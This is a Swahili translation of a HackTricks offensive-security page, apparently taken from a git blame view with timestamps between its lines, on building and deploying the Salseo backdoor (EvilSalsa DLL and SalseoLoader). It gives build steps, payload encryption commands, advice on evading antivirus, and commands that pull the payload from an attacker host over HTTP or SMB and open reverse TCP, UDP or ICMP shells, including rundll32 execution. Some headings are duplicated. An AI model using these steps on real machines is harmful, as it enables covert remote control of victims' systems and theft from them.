2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
< details >
2024-03-17 16:40:00 +00:00
< summary > < strong > Jifunze AWS hacking kutoka sifuri hadi shujaa na< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-30 10:12:47 +00:00
2024-03-17 16:40:00 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI** ](https://github.com/sponsors/carlospolop )!
2024-02-11 02:13:58 +00:00
* Pata [**swag rasmi ya PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-03-29 21:14:28 +00:00
* Gundua [**Familia ya PEASS** ](https://opensea.io/collection/the-peass-family ), mkusanyiko wetu wa [**NFTs** ](https://opensea.io/collection/the-peass-family ) za kipekee
2024-03-17 16:40:00 +00:00
* **Jiunge na** 💬 [**Kikundi cha Discord** ](https://discord.gg/hRep4RUj7f ) au kikundi cha [**telegram** ](https://t.me/peass ) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) na [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repos za github.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-29 21:14:28 +00:00
## Kukusanya faili za binary
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Pakua msimbo wa chanzo kutoka github na kusanya **EvilSalsa** na **SalseoLoader** . Utahitaji **Visual Studio** imewekwa ili kusanya msimbo.
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Kusanya miradi hiyo kwa ajili ya usanifu wa sanduku la windows ambapo utazitumia (Ikiwa Windows inaunga mkono x64 kusanya kwa usanifu huo).
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Unaweza **kuchagua usanifu** ndani ya Visual Studio kwenye **Tab ya "Kujenga" kushoto** katika ** "Lengo la Jukwaa".**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
(\*\*Ikiwa huwezi kupata chaguo hili bonyeza ** "Tab ya Mradi"** kisha kwenye ** "Mali ya \<Jina la Mradi>"**)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Kisha, jenga miradi yote (Kujenga -> Kujenga Suluhisho) (Ndani ya magogo kutatokea njia ya faili ya kutekelezeka):
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
## Andaa mlango wa nyuma
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Kwanza kabisa, utahitaji kuweka msimbo wa **EvilSalsa.dll.** Kufanya hivyo, unaweza kutumia skripti ya python **encrypterassembly.py** au unaweza kusanya mradi **EncrypterAssembly** :
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
### Windows
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-03-17 16:40:00 +00:00
Sasa una kila kitu unachohitaji kutekeleza kila kitu cha Salseo: **EvilDalsa.dll iliyohifadhiwa** na **binary ya SalseoLoader.**
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
**Pakia binary ya SalseoLoader.exe kwenye mashine. Hawapaswi kugunduliwa na AV yoyote...**
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
## **Tekeleza mlango wa nyuma**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
### **Kupata ganda la nyuma la TCP (kupakua dll iliyohifadhiwa kupitia HTTP)**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Kumbuka kuanza nc kama msikilizaji wa ganda la nyuma la nyuma na seva ya HTTP kutumikia evilsalsa iliyohifadhiwa.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-03-17 16:40:00 +00:00
### **Kupata kifuniko cha nyuma cha UDP (kupakua dll iliyohifadhiwa kupitia SMB)**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Kumbuka kuanza nc kama msikilizaji wa kifuniko cha nyuma, na seva ya SMB kuhudumia evilsalsa iliyohifadhiwa (impacket-smbserver).
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-03-29 21:14:28 +00:00
### **Kupata kifaa cha kurudi nyuma cha ICMP (dll iliyosimbwa tayari ndani ya mwathiriwa)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
**Wakati huu unahitaji zana maalum kwenye mteja kupokea kurudi kwa shell. Pakua:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
#### **Zima Majibu ya ICMP:**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2024-02-11 02:13:58 +00:00
#### Tekeleza mteja:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2024-03-17 16:40:00 +00:00
#### Ndani ya mwathiriwa, tuendeshe kitu cha salseo:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-02-11 02:13:58 +00:00
## Kukusanya SalseoLoader kama DLL inayotangaza kazi kuu
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Fungua mradi wa SalseoLoader ukitumia Visual Studio.
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
### Ongeza kabla ya kazi kuu: \[DllExport]
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
### Sakinisha DllExport kwa mradi huu
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
#### **Zana** --> **Msimamizi wa Pakiti ya NuGet** --> **Dhibiti Pakiti za NuGet kwa Suluhisho...**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
#### **Tafuta pakiti ya DllExport (utumie kichupo cha Kutafuta), kisha bonyeza Sakinisha (na ukubali kidirisha cha arifa)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Katika folda yako ya mradi, faili zimeonekana: **DllExport.bat** na **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
### **K**usakinsha DllExport
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Bonyeza **Sakinsha** (ndio, ni ajabu lakini niamini, ni muhimu)
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
### **Toka Visual Studio na tekeleza DllExport\_configure**
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
Tu **toka** Visual Studio
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Kisha, nenda kwenye **folda yako ya SalseoLoader** na **tekeleza DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Chagua **x64** (ikiwa utaitumia ndani ya sanduku la x64, hilo lilikuwa kesi yangu), chagua **System.Runtime.InteropServices** (ndani ya **Jina la Nafasi kwa DllExport** ) na bonyeza **Tumia**
2020-07-15 15:43:14 +00:00
2023-12-27 23:58:16 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
### **Fungua mradi tena na Visual Studio**
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
**\[DllExport]** haipaswi tena kuwa na kosa
2020-07-15 15:43:14 +00:00
2023-06-13 10:12:02 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
### Jenga suluhisho
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Chagua **Aina ya Matokeo = Maktaba ya Darasa** (Mradi --> Mali za SalseoLoader --> Maombi --> Aina ya Matokeo = Maktaba ya Darasa)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Chagua **jukwaa la x64** (Mradi --> Mali za SalseoLoader --> Jenga --> Lengo la Jukwaa = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Kujenga suluhisho: Jenga --> Jenga Suluhisho (Ndani ya konsoli ya matokeo, njia ya DLL mpya itaonekana)
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
### Jaribu Dll iliyozalishwa
2020-07-15 15:43:14 +00:00
2024-03-29 21:14:28 +00:00
Nakili na ubandike Dll mahali unapotaka kuifanyia majaribio.
2020-07-15 15:43:14 +00:00
2024-02-11 02:13:58 +00:00
Tekeleza:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2024-03-29 21:14:28 +00:00
Ikiwa hakuna kosa linaonekana, labda una DLL inayofanya kazi!!
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
## Pata shell ukitumia DLL
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
Usisahau kutumia **server** ya **HTTP** na weka msikilizaji wa **nc**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:00 +00:00
### CMD
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
< details >
2024-03-17 16:40:00 +00:00
< summary > < strong > Jifunze AWS hacking kutoka sifuri hadi shujaa na< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2023-12-30 10:12:47 +00:00
2024-03-17 16:40:00 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA** ](https://github.com/sponsors/carlospolop )!
* Pata [**bidhaa rasmi za PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-03-29 21:14:28 +00:00
* Gundua [**Familia ya PEASS** ](https://opensea.io/collection/the-peass-family ), mkusanyiko wetu wa [**NFTs** ](https://opensea.io/collection/the-peass-family ) za kipekee
2024-03-17 16:40:00 +00:00
* **Jiunge na** 💬 [**Kikundi cha Discord** ](https://discord.gg/hRep4RUj7f ) au kikundi cha [**telegram** ](https://t.me/peass ) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-03-29 21:14:28 +00:00
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) na [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repos za github.
2022-04-28 16:01:33 +00:00
< / details >